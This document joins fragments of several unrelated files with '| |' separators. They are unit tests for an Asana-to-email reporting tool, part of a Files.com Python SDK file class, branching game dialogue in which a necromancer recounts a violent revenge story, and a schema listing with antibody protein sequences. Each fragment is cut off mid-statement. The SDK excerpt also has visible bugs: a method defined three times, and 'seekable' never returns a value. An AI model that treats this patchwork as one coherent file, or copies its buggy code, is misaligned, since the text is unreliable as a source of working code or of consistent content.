current_time_utc, section_filters=None, task_filters=task_filters)
all_calls[-1] = (
{u'text': u'blah', u'type': 'not_a_comment'},
{u'text': u'blah3', u'type': 'not_a_comment'}
)
# Task with no comments
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc)
self.assertEquals(new_project.sections, new_sections)
remove_not_comments = dict(task_comments)
del remove_not_comments[u'456']
mock_create_sections.assert_called_once_with(
project_tasks_json, remove_not_comments)
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=None, task_filters=None)
def test_add_section(self):
self.project.add_section('test')
self.assertNotIn('test', self.project.sections)
new_section = asana_mailer.Section('New Section')
self.project.add_section(new_section)
self.assertIn(new_section, self.project.sections)
def test_add_sections(self):
sections = [asana_mailer.Section('One'), asana_mailer.Section('Two')]
self.project.add_sections(sections)
self.assertEquals(self.project.sections, sections)
self.project.sections = []
list_with_non_sections = [1, 2, 3]
list_with_non_sections.extend(sections)
self.project.add_sections(list_with_non_sections)
self.assertEquals(self.project.sections, sections)
def test_filter_tasks(self):
current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
now = current_time_utc.isoformat()
no_tasks = asana_mailer.Section('No Tasks')
section_with_tasks = asana_mailer.Section('Some Tasks')
incomplete_task_with_tags = asana_mailer.Task(
u'Do Work With Tags', u'test_user', False,
dateutil.parser.parse(now), u'test_description',
dateutil.parser.parse(now),
[u'Tag #{}'.format(i) for i in xrange(5)], [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
]
)
incomplete_task = asana_mailer.Task(
u'More Work', None, False, None, u'more_test_description',
None, [], [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
)
section_with_tasks.add_task(incomplete_task)
self.project.sections = [no_tasks, section_with_tasks]
self.project.filter_tasks(current_time_utc)
self.assertEquals(len(self.project.sections), 1)
self.assertEquals(len(self.project.sections[0].tasks), 1)
# Section Filters
section_filters = ('None of these tasks:',)
self.project.filter_tasks(
current_time_utc, section_filters=section_filters)
self.assertEquals(len(self.project.sections), 0)
# Task Filters
task_filters = frozenset((u'Tag #1',))
section_with_tasks.add_task(incomplete_task_with_tags)
self.project.sections = [no_tasks, section_with_tasks]
self.project.filter_tasks(current_time_utc, task_filters=task_filters)
self.assertEquals(len(self.project.sections), 1)
self.assertEquals(len(self.project.sections[0].tasks), 1)
class SectionTestCase(unittest.TestCase):
def setUp(self):
self.section = asana_mailer.Section('Test Section')
@classmethod
def setup_class(cls):
cls.tasks = [
asana_mailer.Task(
'Task #{}'.format(i), 'test_assignee', False, None,
'test_description', None, [], [])
for i in xrange(5)]
def test_init(self):
self.assertEqual(self.section.name, 'Test Section')
self.assertEqual(self.section.tasks, [])
self.section = asana_mailer.Section('Test Section', [1, 2, 3])
self.assertEqual(self.section.name, 'Test Section')
self.assertEqual(self.section.tasks, [1, 2, 3])
def test_create_sections(self):
now = datetime.datetime.now().isoformat()
project_tasks_json = [
{
'id': u'123', u'name': u'Test Section:',
u'assignee': None, u'completed': False,
u'notes': 'test_description', u'due_on': None,
u'tags': []
},
{
u'id': u'321', u'name': u'Do Work',
u'assignee': {'name': 'test_user'},
u'completed': True,
u'completed_at': now,
u'notes': u'test_description',
u'due_on': now,
u'tags': [{u'name': u'Tag #{}'.format(i)} for i in xrange(5)]
},
{
u'id': u'456', u'name': u'More Work',
u'assignee': None,
u'completed': False,
u'notes': u'more_test_description',
u'due_on': None,
u'tags': []
},
]
task_comments = {
u'123': [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'comment'}
],
u'321': [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
}
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
self.assertEquals(len(sections), 1)
self.assertEquals(sections[0].name, u'Test Section:')
self.assertEquals(len(sections[0].tasks), 2)
first_task = sections[0].tasks[0]
self.assertEquals(first_task.name, u'Do Work')
self.assertEquals(first_task.assignee, u'test_user')
self.assertEquals(first_task.completed, True)
self.assertEquals(
first_task.completion_time, dateutil.parser.parse(now))
self.assertEquals(first_task.description, u'test_description')
self.assertEquals(first_task.due_date, now)
self.assertEquals(first_task.comments, [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
])
self.assertEquals(
first_task.tags, [u'Tag #{}'.format(i) for i in xrange(5)])
second_task = sections[0].tasks[1]
self.assertIsNone(second_task.assignee)
self.assertEquals(second_task.name, u'More Work')
self.assertFalse(second_task.completed)
self.assertIsNone(second_task.completion_time)
self.assertEquals(second_task.description, u'more_test_description')
self.assertIsNone(second_task.due_date)
self.assertEquals(second_task.tags, [])
project_tasks_json.append(
{u'id': u'654', u'name': u'Section With No Tasks:'})
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
self.assertEquals(len(sections), 1)
self.assertEquals(len(sections[0].tasks), 2)
project_tasks_json.insert(
0,
{
u'id': u'789', u'name': u'Misc Task', u'assignee': None,
u'completed': False, u'notes': None, u'due_on': None,
u'tags': []
}
)
sections = asana_mailer.Section.create_sections(
project_tasks_json, task_comments)
print [s.name for s in sections]
self.assertEquals(len(sections), 2)
self.assertEquals(sections[-1].name, u'Misc:')
self.assertEquals(len(sections[-1].tasks), 1)
misc_task = sections[-1].tasks[0]
self.assertEquals(misc_task.name, u'Misc Task')
self.assertIsNone(misc_task.assignee)
self.assertFalse(misc_task.completed)
self.assertIsNone(misc_task.description)
self.assertIsNone(misc_task.due_date)
self.assertEquals(misc_task.tags, [])
def test_add_task(self):
self.section.add_task('test')
self.assertNotIn('test', self.section.tasks)
self.section.add_task(type(self).tasks[0])
self.assertIn(type(self).tasks[0], self.section.tasks)
def test_add_tasks(self):
self.section.add_tasks(type(self).tasks)
self.assertEquals(type(self).tasks, self.section.tasks)
self.section.tasks = []
list_with_non_tasks = [1, 2, 3]
list_with_non_tasks.extend(type(self).tasks)
self.section.add_tasks(list_with_non_tasks)
self.assertEquals(type(self).tasks, self.section.tasks)
class FiltersTestCase(unittest.TestCase):
def test_last_comment(self):
self.assertEqual(asana_mailer.last_comment([]), [])
self.assertEqual(asana_mailer.last_comment(None), [])
self.assertEqual(asana_mailer.last_comment([1, 2, 3]), [3])
self.assertEqual(asana_mailer.last_comment([1, 3]), [3])
self.assertEqual(asana_mailer.last_comment([1]), [1])
def test_most_recent_comments(self):
comments = [1, 2, 3]
self.assertEqual(asana_mailer.most_recent_comments(comments, 0), [3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 4), [1, 2, 3])
self.assertEqual(asana_mailer.most_recent_comments(comments, 1), [3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 2), [2, 3])
self.assertEqual(
asana_mailer.most_recent_comments(comments, 3), [1, 2, 3])
self.assertEqual(asana_mailer.most_recent_comments([], 5), [])
self.assertEqual(asana_mailer.most_recent_comments([], 1), [])
def test_comments_within_lookback(self):
now = datetime.datetime.now(dateutil.tz.tzutc())
comments = [
{u'created_at': (now - datetime.timedelta(days=i)).isoformat()}
for i in reversed(xrange(7))
]
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 0),
comments[-1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 24),
comments[-1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 25),
comments[-2:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 49),
comments[-3:])
print comments
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 144),
comments[1:])
self.assertEqual(
asana_mailer.comments_within_lookback(comments, now, 200),
comments)
self.assertEqual(
asana_mailer.comments_within_lookback([], now, 200), [])
def test_as_date(self):
now = datetime.datetime.now()
now_str = now.isoformat()
now_date_str = now.date().isoformat()
self.assertEqual(asana_mailer.as_date('garbage'), 'garbage')
self.assertEqual(asana_mailer.as_date(now_str), now_date_str)
class TaskTestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
now = datetime.datetime.now(dateutil.tz.tzutc())
name = 'Test'
assignee = 'TestUser'
completed = True
completion_time = now
description = 'A test!'
due_date = now.date().isoformat()
tags = ['test1', 'test2']
comments = []
cls.task = asana_mailer.Task(
name, assignee, completed, completion_time, description, due_date,
tags, comments)
def test_init(self):
original = type(self).task
task = asana_mailer.Task(
original.name, original.assignee,
original.completed, original.completion_time,
original.description, original.due_date,
original.tags, original.comments)
self.assertEqual(task.name, original.name)
self.assertEqual(task.assignee, original.assignee)
self.assertEqual(task.completed, original.completed)
self.assertEqual(task.completion_time, original.completion_time)
self.assertEqual(task.description, original.description)
self.assertEqual(task.due_date, original.due_date)
self.assertEqual(task.tags, original.tags)
self.assertEqual(task.comments, original.comments)
def test_tags_in(self):
filter_set = set()
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1'}
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1', 'test2'}
self.assertEqual(type(self).task.tags_in(filter_set), True)
filter_set = {'test1', 'test2', 'test3'}
self.assertEqual(type(self).task.tags_in(filter_set), False)
class AsanaMailerTestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
cls.current_date = datetime.date.today()
@classmethod
def teardown_class(cls):
for fname in glob.glob('AsanaMailer_*.*'):
if os.path.exists(fname):
os.remove(fname)
@mock.patch('premailer.transform')
@mock.patch('asana_mailer.FileSystemLoader')
@mock.patch('asana_mailer.Environment')
def test_generate_templates(
self, mock_jinja_env, mock_fs_loader, mock_transform):
mock_fs_instance = mock_fs_loader.return_value
mock_env_instance = mock_jinja_env.return_value
mock_get_template = mock_env_instance.get_template.return_value
mock_get_template.render.return_value = 'template render'
mock_transform.return_value = 'premailer transform'
project = mock.MagicMock()
return_vals = asana_mailer.generate_templates(
project, 'html_template', 'text_template', type(self).current_date,
type(self).current_time_utc)
mock_jinja_env.assert_called_once_with(
loader=mock_fs_instance, trim_blocks=True, lstrip_blocks=True,
autoescape=True)
mock_env_instance.get_template.assert_has_calls(
[mock.call('html_template'), mock.call('text_template')],
any_order=True)
mock_fs_loader.assert_called_once_with('templates')
self.assertFalse(mock_env_instance.autoescape)
self.assertEquals(
('premailer transform', 'template render'), | |
<filename>files_sdk/models/file.py
import builtins
import datetime
from builtins import open as builtin_open
from datetime import datetime
import json
import io
from pathlib import Path
from . import file_action
from files_sdk.models.file_action import FileAction
from files_sdk.models.file_upload_part import FileUploadPart
from files_sdk.api import Api
from files_sdk.exceptions import InvalidParameterError, MissingParameterError, NotImplementedError
class File:
default_attributes = {
'path': None, # string - File/Folder path This must be slash-delimited, but it must neither start nor end with a slash. Maximum of 5000 characters.
'display_name': None, # string - File/Folder display name
'type': None, # string - Type: `directory` or `file`.
'size': None, # int64 - File/Folder size
'mtime': None, # date-time - File last modified date/time, according to the server. This is the timestamp of the last Files.com operation of the file, regardless of what modified timestamp was sent.
'provided_mtime': None, # date-time - File last modified date/time, according to the client who set it. Files.com allows desktop, FTP, SFTP, and WebDAV clients to set modified at times. This allows Desktop<->Cloud syncing to preserve modified at times.
'crc32': None, # string - File CRC32 checksum. This is sometimes delayed, so if you get a blank response, wait and try again.
'md5': None, # string - File MD5 checksum. This is sometimes delayed, so if you get a blank response, wait and try again.
'mime_type': None, # string - MIME Type. This is determined by the filename extension and is not stored separately internally.
'region': None, # string - Region location
'permissions': None, # string - A short string representing the current user's permissions. Can be `r`,`w`,`p`, or any combination
'subfolders_locked?': None, # boolean - Are subfolders locked and unable to be modified?
'download_uri': None, # string - Link to download file. Provided only in response to a download request.
'priority_color': None, # string - Bookmark/priority color of file/folder
'preview_id': None, # int64 - File preview ID
'preview': None, # File preview
'action': None, # string - The action to perform. Can be `append`, `attachment`, `end`, `upload`, `put`, or may not exist
'length': None, # int64 - Length of file.
'mkdir_parents': None, # boolean - Create parent directories if they do not exist?
'part': None, # int64 - Part if uploading a part.
'parts': None, # int64 - How many parts to fetch?
'ref': None, # string -
'restart': None, # int64 - File byte offset to restart from.
'structure': None, # string - If copying folder, copy just the structure?
'with_rename': None, # boolean - Allow file rename instead of overwrite?
}
def __init__(self, *args):
self.set_attributes({})
self.options = {}
self.mode = 'r'
self.upload = None
self.etags = None
self.io_obj = io.StringIO()
self.closed = True
self.bytes_written = 0
if len(args) >= 1:
if isinstance(args[0], dict):
self.set_attributes(args[0])
elif isinstance(args[0], str):
self.set_attributes({"path": args[0]})
if len(args) >= 2:
if isinstance(args[1], dict):
self.options = args[1]
elif isinstance(args[1], str):
self.mode = args[1]
if len(args) >= 3:
if isinstance(args[2], dict):
self.options = args[2]
def set_attributes(self, attributes):
for (attribute, default_value) in File.default_attributes.items():
setattr(self, attribute, attributes.get(attribute, default_value))
def get_attributes(self):
return {k: getattr(self, k, None) for k in File.default_attributes if getattr(self, k, None) is not None}
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __del__(self):
if not self.io_obj.closed:
self.io_obj.close()
def close(self):
self.flush()
if self.upload:
end_options = {
"action": "end",
"etags": self.etags,
"provided_mtime": datetime.now().isoformat(),
"ref": self.upload.ref,
"size": self.bytes_written
}
file = create(self.path, end_options, self.options)
self.set_attributes(file.get_attributes())
self.mode = 'r'
self.upload = None
self.etags = None
self.io_obj = io.StringIO()
self.io_obj.close
self.closed = True
def fileno(self):
raise OSError
def flush(self, *_args):
if "w" in self.mode:
if self.io_obj.seekable():
self.io_obj.seek(0)
self.upload, self.etags, bytes_written = upload_chunks(self.io_obj, self.path, self.options, self.upload, self.etags)
self.bytes_written += bytes_written
elif "a" in self.mode:
raise io.UnsupportedOperation("Append is not a supported mode")
def isatty(self):
return False
def read(self):
if self.readable():
self.download_content(self.io_obj, False if "b" in self.mode else True)
self.io_obj.seek(0)
return self.io_obj.read()
else:
raise OSError("read mode not indicated")
def readable(self):
if 'r' in self.mode and not self.closed:
return True
return False
def readall(self):
self.read()
def readinto(self):
return NotImplementedError
def readline(self):
return NotImplementedError
def readline(self):
return NotImplementedError
def readline(self):
return NotImplementedError
def seek(self):
raise OSError
def seekable(self):
False
def tell(self):
raise OSError
def truncate(self):
raise OSError
def writeable(self):
if "w" in self.mode and not self.closed:
return True
return False
def write(self, *args):
if self.writeable():
self.io_obj.write(*args)
else:
raise OSError("write mode not indicated")
def download_uri_with_load(self):
if self.download_uri:
return self.download_uri
f = download(self.path, {}, self.options)
self.set_attributes(f.get_attributes())
return self.download_uri
def download_content(self, io, is_string_io = False):
Api.api_client().stream_download(self.download_uri_with_load(), io, is_string_io)
def download_file(self, output_file):
with builtin_open(output_file, 'wb') as file:
self.download_content(file)
# Download file
#
# Parameters:
# action - string - Can be blank, `redirect` or `stat`. If set to `stat`, we will return file information but without a download URL, and without logging a download. If set to `redirect` we will serve a 302 redirect directly to the file. This is used for integrations with Zapier, and is not recommended for most integrations.
# preview_size - string - Request a preview size. Can be `small` (default), `large`, `xlarge`, or `pdf`.
# with_previews - boolean - Include file preview information?
# with_priority_color - boolean - Include file priority color information?
def download(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "action" in params and not isinstance(params["action"], str):
raise InvalidParameterError("Bad parameter: action must be an str")
if "preview_size" in params and not isinstance(params["preview_size"], str):
raise InvalidParameterError("Bad parameter: preview_size must be an str")
response, _options = Api.send_request("GET", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
# Parameters:
# provided_mtime - string - Modified time of file.
# priority_color - string - Priority/Bookmark color of file.
def update(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "provided_mtime" in params and not isinstance(params["provided_mtime"], str):
raise InvalidParameterError("Bad parameter: provided_mtime must be an str")
if "priority_color" in params and not isinstance(params["priority_color"], str):
raise InvalidParameterError("Bad parameter: priority_color must be an str")
response, _options = Api.send_request("PATCH", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
# Parameters:
# recursive - boolean - If true, will recursively delete folers. Otherwise, will error on non-empty folders.
def delete(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
response, _options = Api.send_request("DELETE", "/files/{path}".format(path=params['path']), params, self.options)
return response.data
def destroy(self, params = None):
self.delete(params)
# Copy file/folder
#
# Parameters:
# destination (required) - string - Copy destination path.
# structure - boolean - Copy structure only?
def copy(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
raise MissingParameterError("Parameter missing: path")
if "destination" not in params:
raise MissingParameterError("Parameter missing: destination")
if "path" in params and not isinstance(params["path"], str):
raise InvalidParameterError("Bad parameter: path must be an str")
if "destination" in params and not isinstance(params["destination"], str):
raise InvalidParameterError("Bad parameter: destination must be an str")
response, _options = Api.send_request("POST", "/file_actions/copy/{path}".format(path=params['path']), params, self.options)
return response.data
# Move file/folder
#
# Parameters:
# destination (required) - string - Move destination path.
def move(self, params = None):
if not isinstance(params, dict):
params = {}
if hasattr(self, "path") and self.path:
params['path'] = self.path
else:
raise MissingParameterError("Current object doesn't have a path")
if "path" not in params:
| |
"""
Dialogue text with with player responses.
- necromancer
- rat
"""
from engine.initiate import player_name
# 80 characters for reference:
#------------------------------------------------------------------------------#
necromancer_dialogue = {
1: {
"text":
"""I have to say, I am impressed. I sensed you intruding my lair and you managed
to pass through my traps and creatures up until now. Now tell me, do you wish
to die here or do you wish to be the test subject for my new experiment? It will
be painful either way!""",
"options": [
(f"My name is {player_name}. I've heard of your exploits against the people of\n\
Stennerden and I've come to bring justice. Duel me, necromancer!", 2),
("I don't care for chat, I will be the last thing you will ever see! (fight)", 21)
]
},
2: {
"text":
"""HAH! A peasant human with your little toy against ME, a mage with years of
conjuration practice and whose life is devoted entirely towards the dark arts?!
I mirth at your feebleness!""",
"options": [
################################################################################...
("Do not underestimate me, mage. I've passed all your traps and destroyed all your\n\
monsters and came out a better warrior than I ever was! Now, will you duel\n\
me?", 3),
("Who you are does not scare me at all. I've come for one thing and one thing\n\
only: your head! (fight)", 21)
]
},
3: {
"text":
"""How very brave. I have met some of you. Though none have lived to tell the tale
of winning a duel with a necromancer. But before I end your life, I will tell
you this: Do you really know why you are here? Randolf only told you what you
needed to know.""",
"options": [
################################################################################...
("You're really tempting me here, mage... but of course. My job here is simple.\n\
You harrass the innocent townspeople and I'm here to stop you. For good.", 4),
("I trust Randolf and his word. I have no quarrel with him either and a fat sum of\n\
aurels is waiting for me back in Stennerden in exchange for your head. What\n\
do you have in mind?", 5),
("I don't stay and chat with the likes of you. Your time ends here! (fight)", 21)
]
},
4: {
"text":
'''I am not surprised by your words. Those "innocent" townspeople have caused me
nothing but agony and humiliation. They were all his believers. It was not
enough either that I had my home scorched up in flames and be sent to a pillory.
And I tell them that Randolf is a cruel and corrupt man, that the blood was
falsely placed on my hands, but to no avail.''',
"options": [
("What do you mean?", 6),
("A change of mind, I don't care to hear a word more. Die! (fight)", 21)
]
},
5: {
"text":
'''I am not surprised by your words. Randolf is a manipulative liar and should be
sentenced to the gallows for what he has done to me and to his fellow
townspeople. But they were all his believers. It was not enough either that I
had my home scorched up in flames and be sent to a pillory. And I tell them that
Randolf is a cruel and corrupt man, that the blood was falsely placed on my
hands, but to no avail.''',
"options": [
("What do you mean?", 6),
("A change of mind, I don't care to hear a word more. Die! (fight)", 21),
]
},
6: {
"text":
"""As I have said previously, Randolf always gets his way out with bribery and
coercion. At least once a week he would set off in the evening with some young
maiden from the village and take her to his manor. And often those maidens were
unwilling as they loved their husbands. But you already know in his nature, he
still managed to submit them to his henious desires, through ways I do not wish
to imagine... But it was until one evening that-""",
"options": [
("*let him continue*", 7),
("Stop, I don't believe any of this. You're trying to get me to side with you.", 20),
("You know what, I have no more time for this. Taste my steel! (fight)", 21),
]
},
7: { # Point of no return, you may only listen to his backstory from now on haha.
"text":
"""-I came home to the sound of struggle and yelping. The front door was locked
so I ran up from the back and to my eyes I saw my poor wife, my beautiful
darling, being mishandled by that pot-bellied, dog-headed whoreson they call the
town bailiff. I yelled her name. I lunged at the bastard and we fought for a bit
until at one moment got the best of me and pulled a dagger to my wife's throat,
claiming he would kill her if I got any closer.""",
"options": [
("...", 8)
]
},
8: {
"text":
"""It was at this point I had to recollect my wits before I could do any sudden
moves. Then there was a knock on the front door. It threw him off guard and a
chance for her to try to release herself and I to intervene. She squared him in
the nose but his stagger dodged my lunge and by then, the dagger was already in
her gut.""",
"options": [
("...", 9)
]
},
9: {
"text":
"""I grabbed a candlestick from the table and whacked him across his fat skull. And
in a fit of rage, I took the knife from his loosened clasp and proceeded to
repeatedly insert it back and forth across his abdomen all while he screeched
for help. It was most unfortunate that two guards happened to come by through
the back door at this state. They saw the blade buried underneath him and a dead
woman laying beside me.""",
"options": [
("...", 10)
]
},
10: {
"text":
"""They took me in for the town's jail, scheduled for the pillory on the morrow,
and the gallows over the next. The bailiff narrowly avoided bleeding out by
hasty action from the town's surgeon, and in hindsight, I should have went for
the throat. But as for her... the Gods could not save her. No form or amount of
explanation overrode his authority as he told them I was strangling my own wife
and that he had come in from the noises to stop me, only to be attacked and
stabbed.""",
"options": [
("...", 11)
]
},
11: {
"text":
"""Pillory day. A God-awful entire day as hurls of rotten vittles, insults, and
whatever filth they brought in rained upon what was left of my dignity. Back in
the cell I was, and they only fed me whatever scraps that were left from the
platform I was on. The last day came and I was only a few hours away from having
my neck hanged up from the gallows. But then I heard this mysterious voice in my
head, telling me how he had a plan for me and that I could still save her.""",
"options": [
("...", 12)
]
},
12: {
"text":
"""She... she was my sole reason to be, and without her the ounce of light I had
left in me had been taken. I chanced upon the offer and it was by some divine
intervention that I was given the fortitude and willpower to strangle the guard
from inside of the cell, unlocked it with his keys, and sneaked out. It was only
a matter of time before others would find out, and I raced to the graveyard and
found her lifeless, cold body still on a cart waiting to be buried.""",
"options": [
("...", 13)
]
},
13: {
"text":
"""I stole her away and escaped into the northern woods. Since then the intrusion
in my head would lead me to things I never would have imagined. I delved into
the mystic arts, into necromancy, still trying to preserve her beautiful body.
For years and years, I studied immensely, still following the voice. But I had
one other thing in mind the whole time. Randolf. And I am so very close to
perfecting my plan in having revenge. And then you | |
# YKTTPPVLDSDGSFFLYSKLTVDKSRWQQGNVFSCSVMHEALHNHYTQKSLSLSPGK' , 'MALW
# TRLRPLLALLALWPPPPARAFVNQHLCGSHLVEALYLVCGERGFFYTPKARREVEGPQVGALELAG
# GPGAGGLEGPPQKRGIVEQCCASVCSLYQLENYCN' , 'EEQVVESGGGFVQPGGSLRLSCAASG
# FTFSPYWMHWVRQAPGKGLVWVSRINSDGSTYYADSVKGRFTISRDNARNTLYLQMNSLRAEDTAV
# YYCARDRYYGPEMWGQGTMVTVSSGSASAPTLFPLVSCENSPSDTSSVAVGCLAQDFLPDSITFSW
# KYKNNSDISSTRGFPSVLRGGKYAATSQVLLPSKDVMQGTDEHVVCKVQHPNGNKEKNVPLPVIAE
# LPPKVSVFVPPRDGFFGNPRKSKLICQATGFSPRQIQVSWLREGKQVGSGVTTDQVQAEAKESGPT
# TYKVTSTLTIKESDWLSQSMFTCRVDHRGLTFQQNASSMCVPDQDTAIRVFAIPPSFASIFLTKST
# KLTCLVTDLTTYDSVTISWTRQNGEAVKTHTNISESHPNATFSAVGEASICEDDWNSGERFTCTVT
# HTDLPSPLKQTISRPKGVALHRPDVYLLPPAREQLNLRESATITCLVTGFSPADVFVQWMQRGQPL
# SPEKYVTSAPMPEPQAPGRYFAHSILTVSEEEWNTGETYTCVVAHEALPNRVTERTVDKSTGKPTL
# YNVSLVMSDTAGTCY' , 'EVKLLESGGGLVQPGGSMRLSCAGSGFTFTDFYMNWIRQPAGKAPE
# WLGFIRDKAKGYTTEYNPSVKGRFTISRDNTQNMLYLQMNTLRAEDTATYYCAREGHTAAPFDYWG
# QGTLVTVSSASTTAPSVFPLAPSCGSTSGSTVALACLVSGYFPEPVTVSWNSGSLTSGVHTFPSVL
# QSSGLYSLSSMVTVPSSRWPSETFTCNVAHPASKTKVDKPVPKRENGRVPRPPDCPKCPAPEMLGG
# PSVFIFPPKPKDTLLIARTPEVTCVVVDLDPEDPEVQISWFVDGKQMQTAKTQPREEQFNGTYRVV
# SVLPIGHQDWLKGKQFTCKVNNKALPSPIERTISKARGQAHQPSVYVLPPSREELSKNTVSLTCLI
# KDFFPPDIDVEWQSNGQQEPESKYRTTPPQLDEDGSYFLYSKLSVDKSRWQRGDTFICAVMHEALH
# NHYTQKSLSHSPGK' , 'QVQLVQSGAEVKKPGASVKVSCKASGYTFTNSWIGWFRQAPGQGLEW
# IGDIYPGGGYTNYNEIFKGKATMTADTSTNTAYMELSSLRSEDTAVYYCSRGIPGYAMDYWGQGTL
# VTVSSASTKGPSVFPLAPSSKSTSGGTAALGCLVKDYFPEPVTVSWNSGALTSGVHTFPAVLQSSG
# LYSLSSVVTVPSSSLGTQTYICNVNHKPSNTKVDKKVEPKSCDKTHTCPPCPAPELLGGPSVFLFP
# PKPKDTLMISRTPEVTCVVVDVSHEDPEVKFNWYVDGVEVHNAKTKPREEQYNSTYRVVSVLTVLH
# QDWLNGKEYKCKVSNKALPAPIEKTISKAKGQPREPQVYTLPPSRDELTKNQVSLTCLVKGFYPSD
# IAVEWESNGQPENNYKTTPPVLDSDGSFFLYSKLTVDKSRWQQGNVFSCSVMHEALHNHYTQKSLS
# LSPGK' , 'DKTHTCPPCPAPEAAGGPSVFLFPPKPKDTLMISRTPEVTCVVVDVSHEDPEVKFN
# WYVDGVEVHNAKTKPREEQYNSTYRVVSVLTVLHQDWLNGKEYKCKVSNKALPAPIEKTISKAKGQ
# PREPQVYTLPPSREEMTKNQVSLSCAVKGFYPSDIAVEWESNGQPENNYKTTPPVLDSDGSFFLVS
# KLTVDKSRWQQGNVFSCSVMHEALHNRYTQKSLSLSPG'
'tax_id': 'NUMERIC',
# EXAMPLES:
# '9913' , '9913' , '9606' , '9606' , '9606' , '9606' , '9913' , '96
# 06' , '9606' , '9606'
}
},
'description': 'TEXT',
# EXAMPLES:
# 'ONCOLYSIN M (Immunotoxin mab)' , 'J591 (111In) (mab)' , 'Vapaliximab (chi
# meric mab)' , 'Prompt bovine insulin zinc suspension' , 'REGN-846 (mab)' ,
# 'ALG-991 (chimeric mab)' , 'Nacolomab tafenatox (mouse Fab)' , 'Felvizuma
# b (humanized mab)' , 'MEDI-500 (mouse mab)' , 'SAR-1349 (mab)'
'helm_notation': 'TEXT',
# EXAMPLES:
# 'PEPTIDE1{D.I.Q.M.T.Q.R.P.D.S.L.S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.
# G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.
# G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.
# G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.
# N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.
# L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.
# G.E.C}|PEPTIDE2{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.S.V.K.V.S.C.K.A.S.G.Y.T.F.
# T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.T.N.Y.N.E.I.F.K.G.
# K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.S.R.G.I.P.G.Y.
# A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.
# A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.
# S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.
# K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.
# L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.
# K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.
# N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.
